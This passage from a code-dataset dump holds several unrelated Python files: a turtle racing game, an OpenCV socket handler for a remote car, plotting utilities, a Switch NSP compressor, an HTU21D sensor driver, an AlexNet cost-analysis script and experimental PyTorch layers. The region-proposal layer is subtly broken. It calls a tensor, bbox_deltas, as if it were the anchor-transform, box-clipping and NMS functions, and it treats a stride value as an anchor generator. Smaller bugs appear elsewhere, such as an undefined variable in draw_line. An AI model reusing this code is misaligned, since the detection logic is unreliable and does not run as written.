turtle.update()\n\n turtle.ontimer(run_game, 16)\n except Exception as e:\n return\n\ndef left():\n global player_pos\n player_pos[0] -= 10\n\ndef right():\n global player_pos\n player_pos[0] += 10\n\ndef up():\n global player_pos, score\n player_pos[1] += 20\n if player_pos[1] > 200:\n player_pos[1] = 200\n\ndef down():\n global player_pos, score\n player_pos[1] -= 20\n if player_pos[1] < -200:\n player_pos[1] = -200\n\ndef start():\n global game_over\n if game_over:\n reset()\n\nturtle.onkeypress(left, 'Left')\nturtle.onkeypress(right, 
'Right')\nturtle.onkeypress(up, 'Up')\nturtle.onkeypress(down, 'Down')\nturtle.onkeypress(start, 'space')\nturtle.listen()\n\nreset()\nrun_game()\n\n","sub_path":"Demos/racer_game.py","file_name":"racer_game.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"553510766","text":"import numpy as np\nimport protocol\nimport socket\nimport base64\nimport cv2\nimport sys, tty, termios\n\ndef draw_line(img,lines):\n gray = cv2.cvtColor(warp,cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray,50,150,apertureSize = 3)\n #cv2.imshow('image',edges)\n minLineLength = 2\n maxLineGap = 1\n lines = cv2.HoughLinesP(edges,1,np.pi/180,5,minLineLength,maxLineGap)\n #print(lines)\n for line in lines:\n x1,y1,x2,y2 = line[0]\n cv2.line(warp,(x1,y1),(x2,y2),(100,50,50),4)\n\n#import command_system\ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\ndef decode_recv(data):\n jpg_original = base64.b64decode(data)\n jpg_as_np = np.frombuffer(jpg_original, dtype=np.uint8)\n image = cv2.imdecode(jpg_as_np, flags=1)\n return image\n\ndef encode_send(char):\n accel=0\n breake=0\n left=0\n right=0\n if(char == \"w\"):\n accel = 1\n if(char == \"s\"):\n breake = 1 \n if(char == \"a\"):\n left = 1\n if(char == \"d\"):\n right = 1\n \n input1 = \"(accel \" +\\\n str(accel) +\\\n \")\" +\\\n \"*\" +\\\n \"(breake \" +\\\n str(breake) +\\\n \")\" +\\\n \"*\" +\\\n \"(left \" +\\\n str(left) +\\\n \")\" +\\\n \"*\" +\\\n \"(right \" +\\\n str(right) +\\\n \")\";\n data = base64.b64encode(input1.encode('utf-8'))\n return data\n\ndef image_warp(image):\n img = cv2.resize(image, (400, 400)) \n src = np.array([[82,247],[227,247],[280,360],[32,360]],np.float32)\n center_x = 150\n center_y = 250\n maxWidth, maxHeight = 400, 400\n hwratio = 11/8.5 #letter size paper\n scale = int(maxWidth/12)\n dst = np.array([\n [center_x - scale, center_y - scale*hwratio], #top left\n [center_x + scale, center_y - scale*hwratio], #top right\n [center_x + scale, center_y + scale*hwratio], #bottom right\n [center_x - scale, center_y + scale*hwratio], #bottom left\n ], dtype = \"float32\")\n M = cv2.getPerspectiveTransform(src, dst)\n warp = cv2.warpPerspective(img, M, (400, 300))\n gray_warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n hsv = cv2.cvtColor(warp, cv2.COLOR_BGR2HSV)\n # define range of blue color in HSV\n lower_blue = np.array([70,50,50])\n upper_blue = np.array([120,255,255])\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n \n return mask\n","sub_path":"pc/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"551809385","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport numpy as np\n\ndef plot_cov_ellipse(cov, pos, nstd=2, ax=None, **kwargs):\n def eigsorted(cov):\n vals, vecs = np.linalg.eigh(cov)\n order = vals.argsort()[::-1]\n return vals[order], vecs[:,order]\n\n if ax is None:\n ax = plt.gca()\n\n vals, vecs = eigsorted(cov)\n theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))\n\n # Width and height are \"full\" widths, not radius\n width, height = 2 * nstd * np.sqrt(vals)\n ellip = Ellipse(xy=pos, width=width, height=height, angle=theta, **kwargs)\n\n 
ax.add_artist(ellip)\n return ellip\n\ndef plot_clusters(Xs, mus, covs):\n fig, ax = plt.subplots(figsize=(4, 4))\n ax.set_xlim(-5, 15)\n ax.set_ylim(-5, 15)\n ax.plot(Xs[:,0], Xs[:,1], 'ro')\n plot_cov_ellipse(cov=covs[0], pos=mus[0], nstd=2, ax=ax, alpha=0.5)\n plot_cov_ellipse(cov=covs[1], pos=mus[1], nstd=2, ax=ax, alpha=0.5)\n plot_cov_ellipse(cov=covs[2], pos=mus[2], nstd=2, ax=ax, alpha=0.5)\n plt.show()\n\ndef plot_velocity_circle(v):\n fig = plt.figure(figsize=(4,4))\n ax = fig.gca()\n ax.scatter(v[:,0], v[:,1], label='z=1')\n ax.scatter(-v[:,0], v[:,1], label='z=2')\n ax.scatter(v[:,0], -v[:,1], label='z=3')\n ax.scatter(-v[:,0], -v[:,1], label='z=4')\n ax.set_xlabel('x velocity')\n ax.set_ylabel('y velocity')\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=4)\n\ndef plot_transition(As_pred, As_true, vmax):\n As_infer = As_pred / As_pred.sum(-1)[:, :, None]\n As_infer = As_infer.mean(0)\n fig3 = plt.figure(figsize=(8,8))\n ax1 = fig3.add_subplot(1, 2, 1)\n infer_plot = ax1.imshow(As_infer, cmap='Greys', vmin=0, vmax=vmax)\n ax1.set_xticks([])\n ax1.set_yticks([])\n ax1.set_title('inferred averaged transition matrix')\n ax2 = fig3.add_subplot(1, 2, 2)\n As_true_ave = As_true.mean(0)\n true_plot = ax2.imshow(As_true_ave, cmap='Greys', vmin=0, vmax=vmax)\n ax2.set_xticks([])\n ax2.set_yticks([])\n ax2.set_title('true averaged transition matrix')\n cbaxes = fig3.add_axes([0.95, 0.32, 0.02, 0.36])\n cb = plt.colorbar(true_plot, cax = cbaxes)\n return As_infer, As_true_ave\n","sub_path":"HMM/util_plots.py","file_name":"util_plots.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"340248701","text":"#from Fs.Pfs0 import Pfs0Stream\nfrom nut import Print\nimport os\nimport json\nimport Fs\nimport Fs.Pfs0\nimport Fs.Type\nimport Fs.Nca\nimport Fs.Type\nimport subprocess\nfrom contextlib import closing\nimport zstandard\nimport time\nfrom tqdm import tqdm\n\ndef sortedFs(nca):\n\tfs = []\n\tfor i in nca.sections:\n\t\tfs.append(i)\n\tfs.sort(key=lambda x: x.offset)\n\treturn fs\n\ndef isNcaPacked(nca):\n\tfs = sortedFs(nca)\n\n\tif len(fs) == 0:\n\t\treturn True\n\n\tnext = 0x4000\n\tfor i in range(len(fs)):\n\t\tif fs[i].offset != next:\n\t\t\treturn False\n\n\t\tnext = fs[i].offset + fs[i].size\n\n\tif next != nca.size:\n\t\treturn False\n\n\treturn True\n\ndef compress(filePath, compressionLevel = 17, outputDir = None, threads = 0):\n\tfilePath = os.path.abspath(filePath)\n\tcontainer = Fs.factory(filePath)\n\n\tcontainer.open(filePath, 'rb')\n\n\tCHUNK_SZ = 0x1000000\n\n\tif outputDir is None:\n\t\tnszPath = filePath[0:-1] + 'z'\n\telse:\n\t\tnszPath = os.path.join(outputDir, os.path.basename(filePath[0:-1] + 'z'))\n\t\t\n\tnszPath = os.path.abspath(nszPath)\n\t\n\tPrint.info('compressing (level %d, %d threads) %s -> %s' % (compressionLevel, threads, filePath, nszPath))\n\t\n\tnewNsp = Fs.Pfs0.Pfs0Stream(nszPath)\n\n\tfor nspf in container:\n\t\tif isinstance(nspf, Fs.Nca.Nca) and (nspf.header.contentType == Fs.Type.Content.PROGRAM or nspf.header.contentType == Fs.Type.Content.PUBLICDATA):\n\t\t\tif isNcaPacked(nspf):\n\t\t\t\tcctx = zstandard.ZstdCompressor(level=compressionLevel, threads = threads)\n\n\t\t\t\tnewFileName = nspf._path[0:-1] + 'z'\n\n\t\t\t\tf = newNsp.add(newFileName, nspf.size)\n\t\t\t\t\n\t\t\t\tstart = f.tell()\n\n\t\t\t\tnspf.seek(0)\n\t\t\t\tf.write(nspf.read(0x4000))\n\t\t\t\twritten = 0x4000\n\t\t\t\t\n\t\t\t\ttimestamp = 
time.time()\n\n\t\t\t\tcompressor = cctx.stream_writer(f)\n\t\t\t\t\n\t\t\t\theader = b'NCZSECTN'\n\t\t\t\theader += len(sortedFs(nspf)).to_bytes(8, 'little')\n\t\t\t\t\n\t\t\t\ti = 0\n\t\t\t\tfor fs in sortedFs(nspf):\n\t\t\t\t\ti += 1\n\t\t\t\t\theader += fs.realOffset().to_bytes(8, 'little')\n\t\t\t\t\theader += fs.size.to_bytes(8, 'little')\n\t\t\t\t\theader += fs.cryptoType.to_bytes(8, 'little')\n\t\t\t\t\theader += b'\\x00' * 8\n\t\t\t\t\theader += fs.cryptoKey\n\t\t\t\t\theader += fs.cryptoCounter\n\t\t\t\t\t\n\t\t\t\tf.write(header)\n\t\t\t\twritten += len(header)\n\t\t\t\t\n\t\t\t\tdecompressedBytes = 0x4000\n\t\t\t\t\n\t\t\t\twith tqdm(total=nspf.size, unit_scale=True, unit=\"B/s\") as bar:\n\t\t\t\t\tfor fs in sortedFs(nspf):\n\t\t\t\t\t\tfs.seek(0)\n\n\t\t\t\t\t\twhile not fs.eof():\n\t\t\t\t\t\t\tbuffer = fs.read(CHUNK_SZ)\n\t\t\t\t\t\t\tnbytes = len(buffer)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif nbytes == 0:\n\t\t\t\t\t\t\t\traise IOError('read failed')\n\n\t\t\t\t\t\t\twritten += compressor.write(buffer)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tdecompressedBytes += nbytes\n\t\t\t\t\t\t\tbar.update(nbytes)\n\t\t\t\tcompressor.flush(zstandard.FLUSH_FRAME)\n\t\t\t\t\n\t\t\t\telapsed = time.time() - timestamp\n\t\t\t\tminutes = elapsed / 60\n\t\t\t\tseconds = elapsed % 60\n\t\t\t\t\n\t\t\t\tspeed = 0 if elapsed == 0 else (nspf.size / elapsed)\n\n\t\t\t\twritten = f.tell() - start\n\t\t\t\tprint('\\ncompressed %d%% %d -> %d - %s' % (int(written * 100 / nspf.size), decompressedBytes, written, nspf._path))\n\t\t\t\tprint('duration: %02d:%02d speed: %.1f MB/s\\n' % (minutes, seconds, speed / 1000000.0))\n\t\t\t\tnewNsp.resize(newFileName, written)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint('not packed!')\n\n\t\tf = newNsp.add(nspf._path, nspf.size)\n\t\tnspf.seek(0)\n\t\twith tqdm(total=nspf.size, unit_scale=True, unit=\"B/s\") as bar:\n\t\t\twhile not nspf.eof():\n\t\t\t\tbuffer = nspf.read(CHUNK_SZ)\n\t\t\t\tf.write(buffer)\n\t\t\t\tbar.update(len(buffer))\n\n\tnewNsp.close()\n","sub_path":"compressor/nut/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"154407614","text":"#!/usr/bin/env python\n\n# Copyright 2014 IIJ Innovation Institute Inc. All rights reserved.\n# Copyright 2014 Keiichi Shima. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n'''A Python class to access HTU21D based relative humidity sensor\nprovided by SWITCHSCIENCE as a part no. SFE-SEN-12064.\n\nExample:\n\nbus = 1\nsensor = htu21d.Htu21d(bus)\nprint(sensor.humidity)\n\n'''\n\nimport time\nimport array\n\nfrom i2cdev import I2C\n\nI2C_SLAVE = 0x0703\nHTU21D_ADDR = 0x40\nCMD_READ_TEMP_HOLD = b\"\\xE3\"\nCMD_READ_HUM_HOLD = b\"\\xE5\"\nCMD_READ_TEMP_NOHOLD = b\"\\xF3\"\nCMD_READ_HUM_NOHOLD = b\"\\xF5\"\nCMD_WRITE_USER_REG = b\"\\xE6\"\nCMD_READ_USER_REG = b\"\\xE7\"\nCMD_SOFT_RESET = b\"\\xFE\"\n\n\nclass Htu21d(object):\n def __init__(self, address):\n self.dev = I2C(HTU21D_ADDR, 1, address) # HTU21D 0x40, bus 1\n with self.dev.lock:\n self.dev.write(CMD_SOFT_RESET) # soft reset\n time.sleep(.1)\n\n def ctemp(self, sensorTemp):\n tSensorTemp = sensorTemp / 65536.0\n return -46.85 + (175.72 * tSensorTemp)\n\n def chumid(self, sensorHumid):\n tSensorHumid = sensorHumid / 65536.0\n return -6.0 + (125.0 * tSensorHumid)\n\n def crc8check(self, value):\n # Ported from Sparkfun Arduino HTU21D Library: https://github.com/sparkfun/HTU21D_Breakout\n remainder = ((value[0] << 8) + value[1]) << 8\n remainder |= value[2]\n\n # POLYNOMIAL = 0x0131 = x^8 + x^5 + x^4 + 1\n # divsor = 0x988000 is the 0x0131 polynomial shifted to farthest left of three bytes\n divsor = 0x988000\n\n for i in range(0, 16):\n if(remainder & 1 << (23 - i)):\n remainder ^= divsor\n divsor = divsor >> 1\n\n if remainder == 0:\n return True\n else:\n return False\n\n def read_temperature(self):\n with self.dev.lock:\n self.dev.write(CMD_READ_TEMP_NOHOLD) # measure temp\n time.sleep(.1)\n\n data = self.dev.read(3)\n buf = array.array('B', data)\n\n if self.crc8check(buf):\n temp = (buf[0] << 8 | buf[1]) & 0xFFFC\n return self.ctemp(temp)\n else:\n return -255\n\n def read_humidity(self):\n with self.dev.lock:\n self.dev.write(CMD_READ_HUM_NOHOLD) # measure humidity\n time.sleep(.1)\n\n data = self.dev.read(3)\n buf = array.array('B', data)\n\n if self.crc8check(buf):\n humid = (buf[0] << 8 | buf[1]) & 0xFFFC\n return self.chumid(humid)\n else:\n return -255\n\nif __name__ == \"__main__\":\n obj = HTU21D(I2C_SLAVE)\n print(\"Temp:\", obj.read_temperature(), \"C\")\n print(\"Humid:\", obj.read_humidity(), \"% rH\")\n","sub_path":"linsensors/htu21d.py","file_name":"htu21d.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"180161011","text":"import os\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\nfrom tensorflow.python.framework import meta_graph\nfrom tensorflow.core.protobuf import device_properties_pb2\nfrom tensorflow.python.grappler import cluster\nfrom tensorflow.python.grappler import cost_analyzer\nfrom tensorflow.python.framework import ops as tf_ops\n\nbatch_size = 32\nnum_bathes = 100\n\n\ndef print_tensor_info(tensor):\n print(\"tensor name:\", tensor.op.name, \"-tensor shape:\", tensor.get_shape().as_list())\n\n\ndef inference(images):\n 
parameters = []\n\n with tf.name_scope(\"conv1\") as scope:\n kernel1 = tf.Variable(tf.truncated_normal([11, 11, 3, 64], mean=0, stddev=0.1,\n dtype=tf.float32), name=\"weights\")\n conv = tf.nn.conv2d(images, kernel1, [1, 4, 4, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0, shape=[64], dtype=tf.float32), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(bias, name=scope)\n print_tensor_info(conv1)\n parameters += [kernel1, biases]\n lrn1 = tf.nn.lrn(conv1, 4, bias=1, alpha=1e-3 / 9, beta=0.75, name=\"lrn1\")\n pool1 = tf.nn.max_pool(lrn1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding=\"VALID\", name=\"pool1\")\n print_tensor_info(pool1)\n\n with tf.name_scope(\"conv2\") as scope:\n kernel2 = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=0.1)\n , name=\"weights\")\n conv = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0, dtype=tf.float32, shape=[192])\n , trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(bias, name=scope)\n print_tensor_info(conv2)\n parameters += [kernel2, biases]\n lrn2 = tf.nn.lrn(conv2, 4, 1.0, alpha=1e-3 / 9, beta=0.75, name=\"lrn2\")\n pool2 = tf.nn.max_pool(lrn2, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"VALID\", name=\"pool2\")\n print_tensor_info(pool2)\n\n with tf.name_scope(\"conv3\") as scope:\n kernel3 = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=0.1)\n , name=\"weights\")\n conv = tf.nn.conv2d(pool2, kernel3, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(bias, name=scope)\n parameters += [kernel3, biases]\n print_tensor_info(conv3)\n\n with tf.name_scope(\"conv4\") as scope:\n kernel4 = tf.Variable(tf.truncated_normal([3, 3, 384, 256], stddev=0.1, dtype=tf.float32),\n name=\"weights\")\n conv = tf.nn.conv2d(conv3, kernel4, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), trainable=True, name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(bias, name=scope)\n parameters += [kernel4, biases]\n print_tensor_info(conv4)\n\n with tf.name_scope(\"conv5\") as scope:\n kernel5 = tf.Variable(tf.truncated_normal([3, 3, 256, 256], stddev=0.1, dtype=tf.float32),\n name=\"weights\")\n conv = tf.nn.conv2d(conv4, kernel5, strides=[1, 1, 1, 1], padding=\"SAME\")\n biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), name=\"biases\")\n bias = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(bias)\n parameters += [kernel5, bias]\n pool5 = tf.nn.max_pool(conv5, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"VALID\", name=\"pool5\")\n print_tensor_info(pool5)\n\n pool5 = tf.reshape(pool5, (-1, 6 * 6 * 256))\n weight6 = tf.Variable(tf.truncated_normal([6 * 6 * 256, 4096], stddev=0.1, dtype=tf.float32),\n name=\"weight6\")\n ful_bias1 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name=\"ful_bias1\")\n ful_con1 = tf.nn.relu(tf.add(tf.matmul(pool5, weight6), ful_bias1))\n\n weight7 = tf.Variable(tf.truncated_normal([4096, 4096], stddev=0.1, dtype=tf.float32),\n name=\"weight7\")\n ful_bias2 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name=\"ful_bias2\")\n ful_con2 = tf.nn.relu(tf.add(tf.matmul(ful_con1, weight7), ful_bias2))\n\n weight8 = tf.Variable(tf.truncated_normal([4096, 1000], 
stddev=0.1, dtype=tf.float32),\n name=\"weight8\")\n ful_bias3 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[1000]), name=\"ful_bias3\")\n ful_con3 = tf.nn.relu(tf.add(tf.matmul(ful_con2, weight8), ful_bias3))\n\n weight9 = tf.Variable(tf.truncated_normal([1000, 10], stddev=0.1), dtype=tf.float32, name=\"weight9\")\n bias9 = tf.Variable(tf.constant(0.0, shape=[10]), dtype=tf.float32, name=\"bias9\")\n output_softmax = tf.nn.softmax(tf.matmul(ful_con3, weight9) + bias9)\n\n return output_softmax, parameters\n\n\ndef build_cluster():\n devices = []\n device_properties = device_properties_pb2.DeviceProperties(\n type='CPU',\n frequency=2000,\n num_cores=12,\n l1_cache_size=32768,\n l2_cache_size=262144,\n l3_cache_size=30720*1024)\n for i in range(2):\n devices.append(\n device_properties_pb2.NamedDevice(\n properties=device_properties, name='/CPU:' + str(i)))\n return cluster.Cluster(devices=devices)\n\n\nif __name__ == \"__main__\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n image_size = 224\n images = tf.Variable(tf.random_normal([batch_size, image_size, image_size, 3]))\n output, parameters = inference(images)\n init = tf.global_variables_initializer()\n objective = tf.nn.l2_loss(output)\n grad = tf.gradients(objective, parameters)\n train_op = tf_ops.get_collection_ref(tf_ops.GraphKeys.TRAIN_OP)\n for i in grad:\n train_op.append(i)\n mg = meta_graph.create_meta_graph_def(graph=tf_ops.get_default_graph())\n cluster = build_cluster()\n report = cost_analyzer.GenerateCostReport(mg, per_node_report=True, cluster=cluster)\n with open('alexnet_report.json', \"w\") as f:\n f.write(str(report, encoding=\"utf-8\"))\n","sub_path":"src/pyscript/alexnet_report.py","file_name":"alexnet_report.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89976121","text":"# This file contains experimental modules\n\nfrom models.common import *\n\nclass _ProposalLayer(nn.Module):\n \"\"\"\n Outputs object detection proposals by applying estimated bounding-box\n transformations to a set of regular boxes (called \"anchors\").\n \"\"\"\n\n def __init__(self, feat_stride, scales, ratios):\n super(_ProposalLayer, self).__init__()\n\n self._feat_stride = feat_stride\n self._anchors = torch.from_numpy(feat_stride(scales=np.array(scales),\n ratios=np.array(ratios))).float()\n self._num_anchors = self._anchors.size(0)\n\n # rois blob: holds R regions of interest, each is a 5-tuple\n # (n, x1, y1, x2, y2) specifying an image batch index n and a\n # rectangle (x1, y1, x2, y2)\n # top[0].reshape(1, 5)\n #\n # # scores blob: holds scores for R regions of interest\n # if len(top) > 1:\n # top[1].reshape(1, 1, 1, 1)\n\n def forward(self, input):\n\n # Algorithm:\n #\n # for each (H, W) location i\n # generate A anchor boxes centered on cell i\n # apply predicted bbox deltas at cell i to each of the A anchors\n # clip predicted boxes to image\n # remove predicted boxes with either height or width < threshold\n # sort all (proposal, score) pairs by score from highest to lowest\n # take top pre_nms_topN proposals before NMS\n # apply NMS with threshold 0.7 to remaining proposals\n # take after_nms_topN proposals after NMS\n # return the top proposals (-> RoIs top, scores top)\n\n # the first set of _num_anchors channels are bg probs\n # the second set are the fg probs\n scores = input[0][:, self._num_anchors:, :, :]\n bbox_deltas = input[1]\n im_info = input[2]\n cfg_key = input[3]\n\n pre_nms_topN = 
input[cfg_key].RPN_PRE_NMS_TOP_N\n post_nms_topN = input[cfg_key].RPN_POST_NMS_TOP_N\n nms_thresh = input[cfg_key].RPN_NMS_THRESH\n min_size = input[cfg_key].RPN_MIN_SIZE\n\n batch_size = bbox_deltas.size(0)\n\n feat_height, feat_width = scores.size(2), scores.size(3)\n shift_x = np.arange(0, feat_width) * self._feat_stride\n shift_y = np.arange(0, feat_height) * self._feat_stride\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(),\n shift_x.ravel(), shift_y.ravel())).transpose())\n shifts = shifts.contiguous().type_as(scores).float()\n\n A = self._num_anchors\n K = shifts.size(0)\n\n self._anchors = self._anchors.type_as(scores)\n # anchors = self._anchors.view(1, A, 4) + shifts.view(1, K, 4).permute(1, 0, 2).contiguous()\n anchors = self._anchors.view(1, A, 4) + shifts.view(K, 1, 4)\n anchors = anchors.view(1, K * A, 4).expand(batch_size, K * A, 4)\n\n # Transpose and reshape predicted bbox transformations to get them\n # into the same order as the anchors:\n\n bbox_deltas = bbox_deltas.permute(0, 2, 3, 1).contiguous()\n bbox_deltas = bbox_deltas.view(batch_size, -1, 4)\n\n # Same story for the scores:\n scores = scores.permute(0, 2, 3, 1).contiguous()\n scores = scores.view(batch_size, -1)\n\n # Convert anchors into proposals via bbox transformations\n proposals = bbox_deltas(anchors, bbox_deltas, batch_size)\n\n # 2. clip predicted boxes to image\n proposals = bbox_deltas(proposals, im_info, batch_size)\n # proposals = clip_boxes_batch(proposals, im_info, batch_size)\n\n # assign the score to 0 if it's non keep.\n # keep = self._filter_boxes(proposals, min_size * im_info[:, 2])\n\n # trim keep index to make it euqal over batch\n # keep_idx = torch.cat(tuple(keep_idx), 0)\n\n # scores_keep = scores.view(-1)[keep_idx].view(batch_size, trim_size)\n # proposals_keep = proposals.view(-1, 4)[keep_idx, :].contiguous().view(batch_size, trim_size, 4)\n\n # _, order = torch.sort(scores_keep, 1, True)\n\n scores_keep = scores\n proposals_keep = proposals\n _, order = torch.sort(scores_keep, 1, True)\n\n output = scores.new(batch_size, post_nms_topN, 5).zero_()\n for i in range(batch_size):\n # # 3. remove predicted boxes with either height or width < threshold\n # # (NOTE: convert min_size to input image scale stored in im_info[2])\n proposals_single = proposals_keep[i]\n scores_single = scores_keep[i]\n\n # # 4. sort all (proposal, score) pairs by score from highest to lowest\n # # 5. take top pre_nms_topN (e.g. 6000)\n order_single = order[i]\n\n if pre_nms_topN > 0 and pre_nms_topN < scores_keep.numel():\n order_single = order_single[:pre_nms_topN]\n\n proposals_single = proposals_single[order_single, :]\n scores_single = scores_single[order_single].view(-1, 1)\n\n # 6. apply nms (e.g. threshold = 0.7)\n # 7. take after_nms_topN (e.g. 300)\n # 8. 
return the top proposals (-> RoIs top)\n\n keep_idx_i = bbox_deltas(torch.cat((proposals_single, scores_single), 1), nms_thresh)\n keep_idx_i = keep_idx_i.long().view(-1)\n\n if post_nms_topN > 0:\n keep_idx_i = keep_idx_i[:post_nms_topN]\n proposals_single = proposals_single[keep_idx_i, :]\n scores_single = scores_single[keep_idx_i, :]\n\n # padding 0 at the end.\n num_proposal = proposals_single.size(0)\n output[i, :, 0] = i\n output[i, :num_proposal, 1:] = proposals_single\n\n return output\n\n def backward(self, top, propagate_down, bottom):\n \"\"\"This layer does not propagate gradients.\"\"\"\n pass\n\n def reshape(self, bottom, top):\n \"\"\"Reshaping happens during the call to forward.\"\"\"\n pass\n\n def _filter_boxes(self, boxes, min_size):\n \"\"\"Remove all boxes with any side smaller than min_size.\"\"\"\n ws = boxes[:, :, 2] - boxes[:, :, 0] + 1\n hs = boxes[:, :, 3] - boxes[:, :, 1] + 1\n keep = ((ws >= min_size.view(-1, 1).expand_as(ws)) & (hs >= min_size.view(-1, 1).expand_as(hs)))\n return keep\n\nclass CrossConv(nn.Module):\n # Cross Convolution Downsample\n def __init__(self, c1, c2, k=3, s=1, g=1, e=1.0, shortcut=False):\n # ch_in, ch_out, kernel, stride, groups, expansion, shortcut\n super(CrossConv, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, (1, k), (1, s))\n self.cv2 = Conv(c_, c2, (k, 1), (s, 1), g=g)\n self.add = shortcut and c1 == c2\n\n def forward(self, x):\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\n\nclass ConvPlus(nn.Module):\n # Plus-shaped convolution\n def __init__(self, c1, c2, k=3, s=1, g=1, bias=True): # ch_in, ch_out, kernel, stride, groups\n super(ConvPlus, self).__init__()\n self.cv1 = nn.Conv2d(c1, c2, (k, 1), s, (k // 2, 0), groups=g, bias=bias)\n self.cv2 = nn.Conv2d(c1, c2, (1, k), s, (0, k // 2), groups=g, bias=bias)\n\n def forward(self, x):\n return self.cv1(x) + self.cv2(x)\n\n\nclass C3(nn.Module):\n # Cross Convolution CSP\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\n super(C3, self).__init__()\n c_ = int(c2 * e) # hidden channels\n self.cv1 = Conv(c1, c_, 1, 1)\n self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False)\n self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False)\n self.cv4 = Conv(2 * c_, c2, 1, 1)\n self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3)\n self.act = nn.LeakyReLU(0.1, inplace=True)\n self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\n\n def forward(self, x):\n y1 = self.cv3(self.m(self.cv1(x)))\n y2 = self.cv2(x)\n return self.cv4(self.act(self.bn(torch.cat((y1, y2), dim=1))))\n\n\nclass Sum(nn.Module):\n # Weighted sum of 2 or more layers https://arxiv.org/abs/1911.09070\n def __init__(self, n, weight=False): # n: number of inputs\n super(Sum, self).__init__()\n self.weight = weight # apply weights boolean\n self.iter = range(n - 1) # iter object\n if weight:\n self.w = 